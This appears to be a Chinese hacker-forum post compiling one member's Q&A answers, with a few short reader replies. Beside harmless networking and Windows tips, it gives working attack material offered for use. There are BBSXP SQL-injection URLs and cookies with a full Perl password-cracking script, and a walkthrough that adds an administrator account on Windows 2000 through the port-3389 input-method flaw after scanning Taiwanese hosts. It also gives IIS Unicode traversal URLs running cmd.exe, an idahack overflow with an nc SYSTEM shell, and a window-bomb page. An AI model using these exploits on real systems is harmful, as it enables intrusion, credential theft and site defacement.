返回列表 发帖

[原创]冰血封情精彩问答录第二期

src="images/face/<%=userface%>.gif"> '用这个信息作为判断如果我们提交如下请求: $request= "GET /asp/bbsxp/bbsxp/usercp.asp HTTP/1.0\r\n". "Host: $host\r\n". "Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=i\n\n"; 返回的<%=userface%>不为空的话,则证明root密码为6位,其余一切和上面例子一样! 还想要例子吗?比如说: register.asp: http://www.target.com/asp/bbsxp/bbsxp/register.asp?menu=Check&username=root'and(len(userpass)=6)and'1 可判断条件成功返回字符串:已经有用户使用,请另外选择一个用户名 profile.asp: http://www.target.com/asp/bbsxp/bbsxp/profile.asp?username=root'and(len(userpass)=6)and'1 可判断条件成功返回字符串:用户类型 shop.asp: $request= "GET /asp/bbsxp/bbsxp/shop.asp HTTP/1.0\r\n". "Host: $host\r\n". "Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=iamod\n\n"; 可判断条件成功返回字符串:密码错误 recycle.asp: $request= "GET /asp/bbsxp/bbsxp/recycle.asp HTTP/1.0\r\n". "Host: $host\r\n". "Cookie:eremite=0;username=root'and(len(userpass)%3d6)and'1'%3d'1;userpass=iamod\n\n"; 可判断条件成功返回字符串:本论坛共有 由于篇幅所限,就不一一列举了;此外还有RecoverPasswd.aspv、prison.asp、play.asp、friend.asp、faction.asp、bank.asp...大量文件存在相同问题,真是令人汗颜! 如下是一个通过register.asp文件来破解用户口令的小程序(很快的哦),当然,稍作修改便可用于其他存在相同缺陷的文件或场合: #!/usr/bin/perl #Codz By PsKey2003/3/29 #This Script can crack BBSXP user's password $|=1; use Socket; use Getopt::Std; getopt('hpwu'); print "==========================================\n"; print "Codz By PsKey2003/3/29\n"; print "==========================================\n"; &usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_u)); $host=$opt_h; $port=$opt_p||80; $way=$opt_w; $user=$opt_u; print "\nPlease wait...\n\n"; @dic=(0..100); for ($i=0;$i<@dic;$i++) { $username=$user."'and(len(userpass)='$dic[$i]')and'1"; $request = "GET $way?menu=Check&username=$username HTTP/1.0\r\n". "Host: $host\r\n". "Cookie: eremite=0;\n\n"; print "$dic[$i]."; @in = sendraw($request); @num=grep /已经有用户使用/, @in; $size=@num; if ($size > 0) { print "\n\nSuccessful,The length of the password is $dic[$i] .\n\n"; $lenpwd=$dic[$i]; last; } } for ($j=1;$j<=$lenpwd;$j++) { @dic11=(0..9); @dic12=(a..z); @special=qw(` ~ ! @ # $ %25 ^ %26 * \( \) _ %2b = - { } [ ] : " ; < > ? | , . / \\); @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? | , 。 / 、 〈 〉 '); @dic=(@dic11,@dic12,@special,@special2); for ($i=0;$i<@dic;$i++) { $key=$pws.$dic[$i]; $username=$user."'and(left(userpass,$j)='$key')and'1"; $request = "GET $way?menu=Check&username=$username HTTP/1.0\r\n". "host:$host\r\n". "Cookie: eremite=0;\n\n"; print "$dic[$i]."; @in = sendraw($request); @num=grep /已经有用户使用/, @in; @num1=grep /操作符丢失/, @in; $size=@num; $size1=@num1; if ($size > 0) { $th=$j.th; print "\nSuccessful,The $th word of the password is $dic[$i] \n"; $pws=$pws.$dic[$i]; last; } elsif ($size1 > 0) { $th=$j.th; print "\nSuccessful,The $th word of the password is $dic[$i] \n\n"; print " ☆☆☆☆Attention☆☆☆☆ \n"; print "Something wrong,i can't go on,so you should crack it yourself!Poor...\n"; exit 0; } } } $pws=~s/\%2b/\+/ig; $pws=~s/\%25/\%/ig; $pws=~s/\%26/\&/ig; print "\n\nSuccessful,the full password of $user is $pws.\n"; sub usage { print qq~ Usage: $0 -h [-p ] -w -u -h =hostname you want to crack -p =port,80 default -w =the path of the weak file -u =the user you want to crack Eg: $0 -h www.target.com -p 80 -w /bbsxp/register.asp -u root ~; exit; } #thanx rfp's sendraw sub sendraw { my ($request) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $request; my @in = ; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } 以上转载,我觉得此类问题,对KEN似乎有些太高了…… [答疑]3389端口开放配合输入法漏洞攻击法 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1424
最初由 ****** 发表 [B]3389的端口怎么攻击? [/B]
《红客大联盟原创教程》 NT攻击教程之四() 2001.6.21 --------------------------------------------------------------------------------   攻击系统:WIN 2000 攻击对象:开放3389端口,具有输入法漏洞的中文WIN2000操作系统 使用工具:客户服务端软件 scanner 行动开始,打开scanner,输入一段台湾的IP,开始扫描远程主机的3389端口,呵呵,暂时没事了,和GF温存一下。不一会儿,出现一排开了3389端口的主机了,找一个有主页的IP来测试测试,呵呵,打开客户服务端软件,输入IP后尝试连接,几秒钟的时间便连接上对方的主机了,在客户服务端软件里出现了对方主机的登陆窗口,到现在为止就要看对方的主机有没有输入法漏洞了,如果没有,那就只好打道回府了。我们把鼠标放到用户名框里点击一下,然后按ctrl+shift,把输入法转换到全拼的状态下,然后把鼠标放到状态条的图标上,按右键弹出一个选项,里面有个选项是帮助,把鼠标放到帮助上,在新弹出的选项里选择“输入法入门”,然后就会弹出一个叫“输入法操作指南”的大的窗口,这个窗口里有个栏目是“选项”,把鼠标放在这个选项上面点击右键,在新弹出的小窗口里选择“跳至URL”,然后就会弹出一个窗口,里面输入盘符就会在“输入法操作指南”窗口的右边显示出来,在这右边的窗口里看,不能进行进一步操作,我们现在呢,有两个办法可以来实现攻击: 1.把c:\winnt\system32\cmd.exe程序改名拷贝到c:\inetpub\scripts\目录下,然后在URL里来实现攻击,具体攻击方法参看《NT攻击教程之二》 2.在“跳至URL”里的框里输入:c:\winnt\systm32\ ,然后在“输入法操作指南”右边的框里找到net.exe这个文件,右键后点击“创建快捷方式”,之后系统会自动创建一个“快捷方式 net.exe”的文件,把鼠标放到这个文件上面右键,点击“属性”,然后会弹出一个“快捷方式 net.exe属性”的窗口,这个窗口的“目标”的框里默认的是:C:\WINNT\system32\net.exe 在这个命令的后面加上user bingxue bingxue /add ,然后确认后把这个“快捷方式 net.exe”文件点击运行,好,现在我们就新建了一个user:bingxue passwd:bingxue 的帐号了,但是权限只是普通用户的,我们现在把这个用户提升到管理员权限,还是在那个“快捷方式 net.exe属性”窗口的C:\WINNT\system32\net.exe 后面加上:localgroup administrators bingxue /add ,这样,我们就把这个帐号的权限提升到管理员了,点击运行后,我们把所有的窗口都关闭,当然,这个登陆的窗口就不用关闭了,不然又得重来,呵呵,在远程登陆的窗口里输入自己设置的用户名和密码,确认后就轻飘飘的进入了系统,呵呵,到现在我们就拥有最高权限了,要改主页就不用我再赘述了吧!!! [答疑]主机IP、子网掩码关系简单讲解 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1381
最初由 ******* 发表 [B]我把你推荐的书买回来看了。有关监听的那本才开始看里边有关主机IP、子网掩码关系的有点不是很明白你能解释一下吗?THANK YOU VERY MUCH! [/B]
RE: 呵呵……何必客气……冰血封情也不是什么高手,正好看过的东西,所以才回答了。 其实,子网掩码是用来判断任意两台计算机的IP地址是否属于同一子网络的根据。 最为简单的理解就是两台计算机各自的IP地址与子网掩码进行AND运算后,如果得出的结果是相同的,则说明这两台计算机是处于同一个子网络上的,可以进行直接的通讯。否则就不可以。 请先看以下示例: 运算演示之一:aa I P 地址  192.168.0.1 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 11000000.10101000.00000000.00000001 子网掩码 11111111.11111111.11111111.00000000 AND运算      11000000.10101000.00000000.00000000 转化为十进制后为:       192.168.0.0 运算演示之二: I P 地址  192.168.0.254 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 11000000.10101000.00000000.11111110 子网掩码 11111111.11111111.11111111.00000000 AND运算      11000000.10101000.00000000.00000000 转化为十进制后为:       192.168.0.0 运算演示之三: I P 地址  192.168.0.4 子网掩码  255.255.255.0 AND运算 转化为二进制进行运算: I P 地址 11000000.10101000.00000000.00000100 子网掩码 11111111.11111111.11111111.00000000 AND运算      11000000.10101000.00000000.00000000 转化为十进制后为:       192.168.0.0   通过以上对三组计算机IP地址与子网掩码的AND运算后,我们可以看到它运算结果是一样的。均为192.168.0.0   所以计算机就会把这三台计算机视为是同一子网络,然后进行通讯的。我现在单位使用的代理服务器,内部网络就是这样规划的。 也许你又要问,这样的子网掩码究竟有多少了IP地址可以用呢?你可以这样算。 根据上面我们可以看出,局域网内部的ip地址是我们自己规定的(当然和其他的ip地址是一样的),这个是由子网掩码决定的通过对255.255.255.0的分析。可得出:   前三位IP码由分配下来的数字就只能固定为192.168.0  所以就只剩下了最后的一位了,那么显而易见了,ip地址只能有(2的8次方-1),即256-1=255一般末位为0或者是255的都有其特殊的作用。 那么你可能要问了:如果我的子网掩码不是255.255.255.0呢?你也可以这样做啊假设你的子网掩码是255.255.128.0 那么你的局域网内的ip地址的前两位肯定是固定的了(什么,为什么是固定的?你看上边不就明白了吗?·#¥) 这样,你就可以按照下边的计算来看看同一个子网内到底能有多少台机器 1、十进制128 = 二进制1000 0000 2、IP码要和子网掩码进行AND运算 3、 I P 地址 00010000.01001001.1*******.******** 子网掩码 11111111.11111111.10000000.00000000 AND运算      00010000.01001001.10000000.00000000 转化为十进制后为:       16 . 73 . 128 . 0 4、可知我们内部网可用的IP地址为: 00010000.01001001.10000000.00000000        到 00010000.01001001.11111111.11111111 5、转化为十进制: 16.73.128.0 到 16.73.255.255 6、0和255通常作为网络的内部特殊用途。通常不使用。 7、于是最后的结果如下:我们单位所有可用的IP地址为: 192.168.128.1-192.168.128.254 192.168.129.1-192.168.129.254 192.168.130.1-192.168.130.254 192.168.131.1-192.168.131.254 . . . . . . . . . . . . . 192.168.139.1-192.168.139.254 192.168.140.1-192.168.140.254 192.168.141.1-192.168.141.254 192.168.142.1-192.168.142.254 192.168.143.1-192.168.143.254 . . . . . . . . . . . . . 192.168.254.1-192.168.254.254 192.168.255.1-192.168.255.254 8、总数为(255-128+1)*(254-1+1) =128 * 254 = 32512 FAINT!!!!@#!@把我们公司都买了还买不了这么多的机器呢!·¥!·# 9、看看的结果是否正确   (1)、设定IP地址为192.168.128.1     Ping 192.168.129.233通过测试     访问http://192.168.129.233可以显示出主页   (2)、设定IP地址为192.168.255.254     Ping 192.168.129.233通过测试     访问http://192.168.129.233可以显示出主页 10、结论   以上证明我们的结论是对的。现在你就可以看你的子网中能有多少台机器了 255.255.255.128 分解: 11111111.11111111.11111111.1000000 所以你的内部网络的ip地址只能是xxxxxxxx.xxxxxxxx.xxxxxxxx.0??????? 到 xxxxxxxx.xxxxxxxx.xxxxxxxx.01111111 怎么样,这下你知道多少了吧? 抱歉,冰血封情也只能详细到这里了…… 不然,冰血封情也不知道如何再进行更详细的解释了…… 呵呵…… 最后感谢您提出问题…… [答疑]139入侵host not found的详细解说 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1380
最初由 ******** 发表 [B]请问我已找到开139的机子使用nbtstat -a ip命令后显示 本地连接 node ipaddress:[xxx.xxx.x.xxx]scope id [] host not found. 请问这是什么意思?我该怎么做才可利用139成功入侵?我使用XP操作系统?..[/B]
RE: 在正常情况下应该是这样的:
Node IpAddress: [xxx.xxx.x.xxx] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- REFDOM <00> UNIQUE Registered REFDOM <03> UNIQUE Registered REFDOM <20> UNIQUE Registered REFDOM$ <03> UNIQUE Registered INet~Services <1C> GROUP Registered IS~REFDOM.......<00> UNIQUE Registered …… MAC Address = XX-XX-XX-XX-XX-XX 如果对方有文件(或者打印)共享,那么就会显示类似上面的信息。如果出现的是 ‘Host Not Found’,那么就可能没有提供共享或者安装了防火墙之类的软件阻隔了,具体情况冰血封情也很难猜测了:)。 感谢您在暗域提出问题,希望冰血封情的解答对你有帮助:) [答疑]IE中右件网际快车下载失效解决方法 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1568 本文是我的朋友*******所问!希望对他有所帮助! [QUOTE]我前天装了一个网际快车,但不知怎么搞的,当我单击右键时出现了网际快车下载,但我点击时,却没有反应呀!以前都能用呀!!你能帮帮我吗?
在注册表中 打开 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\使用网际快车下载,把右窗口中的内容设置成以下: 键名(默认),键值FLASHGET安装路径\FLASHGET文件夹\jc_all.htm 键名contexts,键值22(十六进制) HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\使用网际快车下载全部链接,把右窗口中的内容设置成以下: 键名(默认),键值FLASHGET安装路径\FLASHGET文件夹\jc_all.htm 键名contexts,键值罚f3(十六进制) [答疑]计算机WINDOWS98/ME安全密码设置全攻略 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1720 问题来源: http://forum.hackway.net/showthread.php?s=&threadid=1719
最初由 ******** 发表 [B]要怎么样才能设置呢?我在控制面板里设置了可只要开机时点击取消就可以进入。有什么别的办法吗?? [/B]
正文回答: 第一关:CMOS密码(联想的计算机要先开BIOS保护开关) 1、开机按DEL进入CMOS,选择Set Supervisor Password设置CMOS密码,系统会让你输入两次,输入完回车即可;再选择Set User Password设置系统开机密码 //设置CMOS密码是防止非法使用者进入蓝屏启动主板默认设置消除密码!!!!!!! 2、找到Advanced BIOS Features回车进入第二蓝屏,找到First Boot Device项,按小键盘区域的PgDn将其属性修改成Disabled;再找到Security Option项,按小键盘区域的PgDn将其属性修改成System,然后按一次Esc退出第二蓝屏,在第一蓝屏按F10选择Y回车退出即可…… //让软驱不加载的目的是为了防止DEBUG和COM方法破解开机的密码!!!!!! 3、然后将机箱后面的BIOS写保护开关关闭,重新启动计算机就OK! 第二关:WINDOWS密码(这里只讨论WIN98和WINME) 1、打开"控制面版"中的"密码"选项里设置"更改Windows密码","旧密码" 不用 填,直接填新密码,并且确认,WINDOWS会提示您密码已经成功修改! //这是设置密码的过程!!!!!! 2、在"运行"里键入"regedit",确定后进入注册表编辑器,HKEY_LOCAL_MACHINE\ Network\Logon,在右边的窗口中,右键单击,选择"新建"-"DWORD值",键名输入MustBeValidated,改名后双击该键名,将其键值设置为1,然后退出重新启动计算机,WINDOWS登录密码设定过程已经完毕! //这样的键值设置是让非法用户无法通过点击"取消"、"关闭"或按"ESC"绕过登录!!!但是用久了有的时候要重新设置这里,因为有时失效!!! 注:"//"后面的内容是说明,为了您的计算机安全,请严格按照每一步,防止被人利用漏洞!!!!!! WIN9X/ME的本地安全性能不如WIN2K等系统,所以能做到的除了FISH说的就还有这个了:) 解释FISH说的: FISH所说的是‘MICROSOFT友好登录’,如果您没有,那么请按照以下的方法做! 桌面上右键单击‘网络邻居’,点选‘属性’,然后再单击‘配置’选项卡,下面有个‘添加’,点了后里面有项‘客户’,点选他后‘确定’,会跳出很多东西给你选,然后点选‘MICROSOFT友好登录’,然后点确定就可以了:)如果不是WINME又没CLONE WIN98安装盘到硬盘,也许需要插入安装盘……这样重新启动就可以了:) [答疑]使用UNICODE漏洞渗透入侵站点 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1724 问题来源: http://forum.hackway.net/showthread.php?s=&postid=7522#post7522
最初由 ******* 发表 [B]那位GG能告诉我几种利用浏览器来进行攻击的方法 就想这样的。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用 http://thegnome.com/cgi-bin/phf?Qal.../passwd指令可以 拿到那个站点的passwd.但还有些更好的执行方法呦如:[/B]
正文回答: 什么是Unicode漏洞呢?因为在Unicode编码中,有这样一个编码方式%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) 等等,在MICROSOFT的IIS中却是这样理解的:他们把“%c1%hh" 解释成(0xc1 -0xc0) * 0x40 + 0xhh 结果就成了这样: %c1%1c --〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f --〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' 别看就这么点小东西,我们通过这两个小小的“/”“\”就可以构造特殊URL来仅通过IE的地址栏深入到系统的根目录!!!黑吧!…… 2001年2月5日,atstake.com上面公布了一个windows2000的net dde消息权限提升漏洞。利用这个漏洞可以获得管理员权限,完全控制机器。 下面是nsfocus.com上面的关于这个漏洞的详细描述。 发布日期: 2001-2-7 更新日期: 2001-2-7 受影响的系统:    Microsoft Windows 2000 Professional   Microsoft Windows 2000 Server   Microsoft Windows 2000 Advanced Server 描述: 网络动态数据交换(Network Dynamic Data Exchange)是一种在不同的Windows机器上的应用程序之间动态共享数据的技术。这种共享是通过名为受信任共享(trusted shares)的通信通道来完成的,受信任共享由网络DDE代理服务来管理。本地机器上的进程可以向网络DDE代理发出请求,包括指定针对某个特定的受信任共享应该运行什么应用程序。但是由于网络DDE代理运行在本地系统用户的安全上下文中并在此安全上下文中处理所有请求,因此攻击者就有机会让网络DDE代理在本地系统用户的安全上下文中执行其指定的代码,从而提升权限并完全控制本地机器。 下面我门来看实际例子,用扫描器(流行的都可以)扫描主机检测漏洞,如果发现对方主机存在这样的漏洞!那么!我们可以采取以下的方式手工入侵…… 首先是将对方的cmd.exe复制到c:\inetpub\scripts\的目录下面方便以后用,并且改名为web.exe! 我们可以在地址栏构造这样的语句来达成: http://IP/scripts/..%c1%c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\web.exe 这样以来您就可以随行所欲的使用cmd.exe,现在它的名字是web.exe(为了不容易被发现)! 那么怎么使用呢??? 使用下面的格式就可以把浏览器的地址栏变成DOS语句的输入窗口: 此为显示C下面所有内容: http://IP/scripts/..%c1%c../winnt/system32/cmd.exe?/c+dir+c:\ 看明白了么????不清楚再来看: 此为显示目标主机Program Files文件夹里面的内容: http://IP/scripts/..%c1%c../winnt/system32/cmd.exe?/c+dir+c:\progra~1 此为把某个文件夹内的全部文件一次性COPY到另外的文件夹去 http://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy+c:\fuckkender+c:\inetpub\wwwroot 想必这样不用我说也清楚了……格式就是: http://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+DOS命令+路径 所以说啊!学黑客技术得先学好DOS操作系统…… 不是么! 这里只是答疑,更多的东西需要您自己去钻研…… 感谢您的提问,下次再见:) 灌水广告: ——POWERED BY 中国暗域网络 中国秋血派系冰血封情!
[这个贴子最后由冰血封情在 2003/06/28 03:26pm 第 1 次编辑] 注意:本文所讲的问题是专门为暗域个人会员提供的问题回答……如果转载请注明出处!这里是暗域特色服务,会员问题回答!中国暗域网络的技术交流宗旨是尽力为您排忧解难,给您营造一个健康向上的技术交流环境,打造一流的前瞻性技术资讯站点! [答疑]局域网完全设置客户端解决方案! 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1662 问题来源:
最初由 **** 发表 [B]我有一个客户的机子,是入了两个网的, 一个是集团的,一个是互联网, 集团网可以上,但互联网上不了,集团网那儿是设了固定IP , 网关的, 不知是什么原因呢?请各位高手多多指教!!!!!!!!!!!!![/B] 问题来源:http://forum.hackway.net/showthread.php?s=&threadid=1656
[/quote] 正文回答: 首先在安装了好了所有网络驱动程序之后,右键选择网络邻居。 在‘属性’中选择‘添加’-‘协议’,然后添加‘NetBEUI’和IPX/IPS兼容协议。然后在添加服务:‘微软网络上的文件与打印机共享’! 然后TCP/IP的属性中填写已经分配好的IP地址,和DNS,GATEWAY,子网掩码…… 然后回头设置计算机名和工作组…… 这样设置好了重新启动后~您常识PING GATEWAY的IP地址…… 看看通不通?如果不通就检查自己的网卡和其他的网络连接有没有问题~ 如果您已经确认这些都OK!那么就是主机的问题…… 现在用软件扫描一下GATEWAY的IP,看看是否开了出网的PROXY? 如果开了……尝试在IE里设置GATEWAY为代理,端口填写PROXY服务的端口! 这样一般就可以连接INTERNET了~如果还不行那就是主机的问题…… 询问是否设置了过滤:) 否则我们也无计可施了~~~~~ [答疑]通过null.idq/null.ida漏洞掘取ADMIN权限 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1652 问题来源: http://forum.hackway.net/showthread.php?s=&threadid=1651 正文回答: 您提供的那台主机太恐怖了,全都是洞,随便用个一个能取得权限的流行漏洞来给你讲讲吧:) 本问一处需要使用的工具有:idqhack/idahack、NC连接工具…… 都在这里下:http://tee.96188.com/download/ 以下我们假设已经把下载的溢出程序放在了C:\下 那么开始~ c:\idahack 127.0.0.1 80 1 80 connecting... sending... Now you can telnet to 80 port Good luck  现在轻松溢出成功,现在你可以telnet它的80端口,这里冰血封情用NC来连接。 C:\nc -vv 127.0.0.1 80 Microsoft Windows 2000 [Version 5.00.2195] (C)版权所有 1985-1998 Microsoft Corp C:\WINNT\system32> 现在我们已经成功入侵得到了SYSTEM权限,下面就是加用户和做你想做的了:) [答疑]漫谈无标识的共享的实现以及修改硬盘图标 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1636 问题来源:
最初由 ********** 发表 [B]在共享时图标会出现一个“手”,我如何才能做到共享后图标还是原来的模样呢??还有一个问题,就是如何改变C盘的图标 [/B]
http://forum.hackway.net/newrepl ... ewreply&postid=7212 正文回答: 运行Regedit命令,打开注册表,找到下面的子键:HKEY_LOCAL_MACHINE\software\Mi-crosoft\Windows\CurrentVersion\Network\Lanman\C$,在屏幕的右边,你就可以看见下面的内容: Flags 0x00000302(770) Parm1enc(长度为零的二进制值) Parm2enc(长度为零的二进制值) Path"c:" Remark"Remark By Scent Lily" Type 0x00000000(0) 关键的地方就是FLAG这个参数,它的键值决定了共享目录的类型。普通共享是191,隐藏共享是102…… 而我们把FLAGS的值设为302(16进制,其实就是770)就可以实现无共享标识的共享了。注意这里不但没有‘小手’,而且甚至右键菜单的‘属性’也看不出来共享哦:)GOOD LUCK! 下面我们说说如何自定义硬盘图标!新建一个AutoRun.inf文件。内容如下: [autorun] ICON=X.ico 其中X.ico就是图标的文件名,如果不在同一目录就要写路径。 [答疑]JAVASCRIPT开无数窗口代码深入讨论 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1372
[I]最初由[B]******[/B]发表[/I] 冰血封情GG这个怎么用啊?
这个其实是早先的JAVASCRIPT网页炸弹,利用for循环或while循环不断地开窗口!! 具体使用方法是,在HTML的网页的BODY中插入这段代码! 然后打开了就会自动跳出100个窗口!! 那么其实我们还可以进一步使用…… 让其不点连接就直接跳出窗口!! 下面给出完整代码: Hackway Power Of China 将以上代码复制到一个文本,另存为“所有文件”,1.htm,打开后,只要鼠标指到了“冰血封情冰雪心!”的上面!就会跳出无数个窗口…… 那么还可以把文字换成成图片,得DD自己做!! 留给你的思考问题:) [答疑]有关论坛的Sql Injection漏洞的问题 主题转载:http://forum.hackway.net/showthread.php?s=&threadid=1436 问题来源:http://forum.hackway.net/showthread.php?s=&threadid=1428
最初由 ******** 发表 [B]近来在研究“BBSXP多个文件存在Sql Injection漏洞我在研究过程中发现,出现了一个小问题。因为我们学校的论坛正好是BBSXP这类型的。我在上面注册了一用户。得到了版主的权限。例如:我的用户为:ABC,这个用户是?.. [/B]
描述: BBSXP在对用户输入和cookie的审查上只用了类似如下的简单处理:
if instr(username," ")>0 then:error("
  • 非法操作"):end if if Request.Cookies("username")="" then error("
  • 您还还未登陆社区")
  • 似乎身份验证的地方过于简单了~~
    login.asp ... if instr(username," ")>0 then:error("
  • 非法操作"):end if//空格!!?? sql="select * from user where username='"&username&"'" rs.Open sql,Conn if rs.eof then message=message&"
  • 此用户名还未注册" error(""&message&"") end if if userpass<>rs("userpass") then message=message&"
  • 您输入的密码错误"
  • 显然这里不能来个 username=root' and len(userpass)=6 and '1,但没有空格一样可以: http://www.XXXXXXX.com/asp/bbsxp/bbsxp/login.asp?menu=add&url=&username=root'and(len(userpass)=6)and'1&userpass=asd&Submit1=+%B5%C7%C2%BD+ 可判断”设立条件成功”返回的字符串:您输入的密码错误;即返回“您输入的密码错误”则说明root用户的密码长度是6位,接着使用left()、right()可以推算出密码了,但手工推测是很吃力的,我们可以根据提交一个请求后的返回值判断我们设立的条件成功与否,这样可以写个小的密码破解程序,本文结尾附了PsKey大虾写的一个测试程序。 再看一个构造cookie来达到Sql Injection的例子:
    usercp.asp: -------------包含文件setup.asp中的关键代码 sql="select * from user where username='"&Request.Cookies("username")&"'" if Request.Cookies("userpass")<>us("userpass") then Response.Cookies("username")="" Response.Cookies("userpass")="" '如果密码不对cookie清空 end if userface=""&us("userface")&"" '败笔,保存了一个值,可作返回值判断 -------------setup.asp中的关键代码结束 用户头像

    [原创]冰血封情精彩问答录第二期

      
        也不是什么很有特色的东西啊~
        只是能把这些全整理出来,倒是辛苦了。

    TOP

    [原创]冰血封情精彩问答录第二期

    多谢指导……

    TOP

    [原创]冰血封情精彩问答录第二期

    遇到好东西就打包带走!有,我们就吸收!

    TOP

    [原创]冰血封情精彩问答录第二期

    好!不错!真辛苦你了!哈!
    我觉得现在的斑竹很不负责,文章没有真正归类!
    好的文章也没列如精华区!
    希望叶子兄辛苦一下!多多打点一下!

    TOP

    返回列表 回复 发帖